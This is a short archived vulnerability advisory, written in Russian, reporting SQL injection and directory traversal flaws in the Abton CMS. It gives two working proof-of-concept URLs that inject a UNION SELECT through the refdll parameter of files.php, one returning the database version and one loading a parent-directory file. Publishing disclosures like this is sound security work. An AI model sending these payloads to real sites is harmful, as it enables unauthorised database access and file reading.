SQL Injection and Directory Traversal vulnerabilities in Abton

2010-02-22T00:00:00
ID SECURITYVULNS:DOC:23259
Type securityvulns
Reporter Securityvulns
Modified 2010-02-22T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL Injection и Directory Traversal уязвимостях в Abton (это украинская CMS).

SQL Injection:

http://site/files.php?refdll=-1+union+select+version()%23

Directory Traversal (через SQL Injection):

http://site/files.php?refdll=-1+union+select+’../file.php’%23

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/3618/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua